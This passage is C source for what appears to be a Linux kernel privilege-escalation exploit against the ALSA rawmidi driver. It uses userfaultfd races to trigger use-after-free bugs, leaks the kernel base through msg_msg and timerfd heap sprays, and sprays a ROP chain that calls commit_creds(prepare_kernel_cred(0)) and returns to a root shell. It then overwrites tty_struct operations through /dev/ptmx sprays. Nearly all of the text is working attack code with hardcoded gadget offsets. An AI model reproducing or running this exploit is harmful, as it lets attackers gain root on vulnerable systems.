            uffdio_copy.copy = 0;

            if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1)  
            {  
                perror("[-] ioctl");  
                exit(0);  
            }

            release_page_fault = false;  
        }  
    }

    close(uffd);  
    puts("[+] Page fault thread finished");  
}

void *trigger_userfaultfd(struct args_trigger *args)  
{  
    char *addr = (char *) args->addr;  
    int size = args->size;  
    uint32_t fd = (uint64_t) args->fd;

    write(fd, addr, size);  
}

void send_msg(int qid, const void *msg_buf, size_t size, long mtype)  
{  
    struct msgbuf  
    {  
        long mtype;  
        char mtext[size - 0x30];  
    } msg;

    msg.mtype = mtype;  
    memcpy(msg.mtext, msg_buf, sizeof(msg.mtext));

    if (msgsnd(qid, &msg, sizeof(msg.mtext), 0) == -1)  
    {  
        perror("msgsnd");  
        exit(1);  
    }  
}

void *recv_msg(int qid, size_t size)  
{  
    void *memdump = malloc(size);

    if (msgrcv(qid, memdump, size, 0, IPC_NOWAIT | MSG_NOERROR) == -1)  
    {  
        perror("msgrcv");  
        return NULL;  
    }

    return memdump;  
}

void build_rop(char *buf)  
{  
    uint64_t *rop = (uint64_t *)&buf[0x0];  
    int k = 0;

    /* commit_creds(prepare_kernel_cred(0)) */  
    rop[k++] = kernel_base + 0x15e8; // pop rdi ; ret  
    rop[k++] = 0x0;  
    rop[k++] = kernel_base + 0x8a800; // prepare_kernel_cred  
    rop[k++] = kernel_base + 0x49fb8; // pop rdx ; ret  
    rop[k++] = 0x8;  
    rop[k++] = kernel_base + 0xa6b081; // cmp rdx, 8 ; jne 0xffffffff81a6b05e ; ret  
    rop[k++] = kernel_base + 0x3dfdb4; // mov rdi, rax ; jne 0xffffffff813dfda1 ; xor eax, eax ; ret  
    rop[k++] = kernel_base + 0x8a3c0; // commit_creds

    /* kpti trampoline */  
    rop[k++] = kernel_base + 0xc00a45; // swapgs_restore_regs_and_return_to_usermode + 22  
    rop[k++] = 0x0; // rax  
    rop[k++] = 0x0; // rdi

        rop[k++] = (unsigned long)&getRootShell;  
    rop[k++] = (unsigned long)usr_cs;  
    rop[k++] = (unsigned long)usr_rflags;  
    rop[k++] = (unsigned long)usr_sp;  
    rop[k++] = (unsigned long)usr_ss;

    uint64_t *func_table = (uint64_t *)&buf[0x100];  
    for (size_t i = 0; i < 12; i++)  
    {  
        if (i == 4)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret;  
            continue;  
        }

        if (i == 5)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        if (i == 6)  
        {  
            *func_table++ = kernel_base + 0x1e; // ret  
            continue;  
        }

        *func_table++ = 0xdeadbeefdeadbe00 + i;  
    }

    *func_table = pivot;  
}

void pin_cpu(long cpu_id)  
{  
    cpu_set_t mask;

    CPU_ZERO(&mask);  
    CPU_SET(cpu_id, &mask);

    if (sched_setaffinity(0, sizeof(mask), &mask) == -1)  
    {  
        err("`sched_setaffinity()` failed: %s", strerror(errno));  
    }

    return;  
}

void main(void)  
{  
    pin_cpu(0);

    struct snd_rawmidi_params srp;

    save_state();

    /* ===================== [ SETP 1 - KASLR Leak ] ===================== */

    puts("[+] STEP 1 : KASLR leak");  
    fd1 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd1 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    int qid[2];  
    if ((qid[0] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    struct itimerspec its;

    its.it_interval.tv_sec = 0;  
    its.it_interval.tv_nsec = 0;  
    its.it_value.tv_sec = 9999;  
    its.it_value.tv_nsec = 0;

    int tfd[256];

    for(int i = 0; i < 256 / 2; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    if ((page = mmap((void *)0x1336000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    char *addr = page;  
    memset(addr, 'A', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT1);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[0], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 256 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 240;  
    srp.avail_min = 1;  
    uint64_t err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 256");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    struct args_trigger args;  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd1;

    /* Blocking before object created by size 256 in userfault */  
    pthread_create(&thread[1], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 256 generating an UAF */  
    srp.buffer_size = 250;  
    err = ioctl(fd1, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 256 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* send_msg 'A' */  
    char buf[0xf8 - 0x30];  
    memset(buf, 0x41, sizeof(buf));  
    send_msg(qid[0], buf, 0xf8, 1);

    puts("[+] Allocate msg_msg in kmalloc-256");

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    /* spray timerfd_ctx in kmalloc-256 */  
    for(int i = 256 / 2; i < 256; i++)  
    {  
        tfd[i] = timerfd_create(CLOCK_REALTIME, 0);  
        timerfd_settime(tfd[i], 0, &its, 0);  
    }

    puts("[+] Allocate timerfd_ctx in kmalloc-256");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak = recv_msg(qid[0], 0x2000);

    // hexdump(leak, 0x2000);

    timerfd_tmrproc =  *(leak + (0x200 / sizeof(uint64_t)));  
    kernel_base = timerfd_tmrproc - 0x2201f0;  
    pivot = kernel_base + 0x8fc625; // push r8 ; add byte ptr [rbp + 0x41], bl ; pop rsp ; pop r13 ; ret

    printf("[+] timerfd_tmrproc addr : 0x%lx\n", timerfd_tmrproc);  
    printf("[+] kernel_base addr : 0x%lx\n", kernel_base);  
    printf("[+] pivot addr : 0x%lx\n", pivot);

    for(int i = 0; i < 256; i++)  
    {  
        close(tfd[i]);  
    }

    close(fd1);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 2 - SMAP Bypass ] ===================== */

    puts("\n[+] STEP 2 : SMAP bypass");

        release_page_fault = false;

    fd2 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd2 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Opening rawmidi");

    if ((qid[1] = msgget(IPC_PRIVATE, 0666 | IPC_CREAT)) == -1)  
    {  
        perror("msgget");  
        exit(1);  
    }

    if ((page = mmap((void *)0x3330000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'B', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT2);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[2], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 512 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 500;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by size 512");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }  
    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd2;

    /* Blocking before object created by size 512 in userfault */  
    pthread_create(&thread[3], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 512 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 512 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    /* rop spray in kmalloc-512 */  
    char secondary_buf[0x1ea - 0x30];  
    memset(secondary_buf, 0, sizeof(secondary_buf));  
    build_rop(secondary_buf);

    printf("[*] Waiting for userfaultd to finish ..\n");  
    release_page_fault = true;

    for(int i = 0; i < 0x20; i++)  
    {  
        send_msg(qid[1], secondary_buf, 0x1ea, 0x1337);  
    }

    puts("[+] Spray ROP Chain in kmalloc-512");

    while(release_page_fault == true);  
    printf("[+] Page fault lock released\n");

    uint64_t *leak2 = recv_msg(qid[1], 0x2000);  
    next = *(leak2 + (0x1d8 / sizeof(uint64_t))) + 0x30;  
    fake_table = next + 0x100;

    printf("[+] msg_msg->m_list.next leak : 0x%lx\n", next - 0x30);  
    printf("[+] Fake tty_struct->ops function table: 0x%lx\n", fake_table);

    // hexdump(leak2, 0x2000);

    close(fd2);  
    puts("[+] Close rawmidi");

    /* ===================== [ SETP 3 - tty_struct->ops overwrite ] ===================== */

    puts("\n[+] STEP 3 : Fake tty_struct->ops overwrite");

    release_page_fault = false;

    fd3 = open(DRIVER_RAWMIDI, O_RDWR);

    if (fd3 < 0)  
    {  
        perror("[-] open");  
        exit(0);  
    }

    puts("[+] Re-opening rawmidi");

    if ((page = mmap((void *)0x5550000, PAGE_SIZE * 2, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0)) == MAP_FAILED)  
    {  
        perror("[-] mmap()");  
        exit(0);  
    }

    puts("[+] Mapping two pages");

    addr = page;  
    memset(addr, 'C', PAGE_SIZE);

    puts("[+] Registering one page userfaultfd"); 

    /* Registering mapped area */  
    register_userfaultfd((uint64_t *) ADDRESS_PAGE_FAULT3);

    puts("[+] Raising up the handler for userfaultfd");

    /* Handler for userfault */  
    pthread_create(&thread[4], NULL, handler_userfaultfd, (void *) &uffd);

    /* Create one object by size 800 */  
    srp.stream = SNDRV_RAWMIDI_STREAM_OUTPUT;  
    srp.buffer_size = 800;  
    srp.avail_min = 1;  
    err = ioctl(fd2, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Created one object by kmalloc-1024");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    args.addr = addr + PAGE_SIZE - 0x18;  
    args.size = 0x18 + 0x8;  
    args.fd= fd3;

    /* Blocking before object created by size 1024 in userfault */  
    pthread_create(&thread[5], NULL, (void *) trigger_userfaultfd, &args);  
    puts("[+] Triggering userfaultfd");

    /* Deleting before object created by size 1024 generating an UAF */  
    srp.buffer_size = 90;  
    err = ioctl(fd3, SNDRV_RAWMIDI_IOCTL_PARAMS, &srp);

    puts("[+] Deleting before object created by size 1024 generating UAF");

    if (err < 0)  
    {  
        perror("[-] ioctl");  
        exit(0);    
    }

    int spray[256];

    /* tty_struct spray */  
    for(int i = 0; i < 256; i++)  
    {  
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);

        if(spray[i] < 0)  
        {  
            printf("[-] Failed open /dev/ptmx\n");  
        }  
    }

    puts("[+] Allocate tty_struct in kmalloc-1024");

    release_page_fault = true;

    while(release_page_fault == true);  
    puts("[+] Page fault lock released");

    for(int i = 0; i < 256; i++)  
    {  
        ioctl(spray[i], 0, next - 8);  
    }  
}

Tag

#intel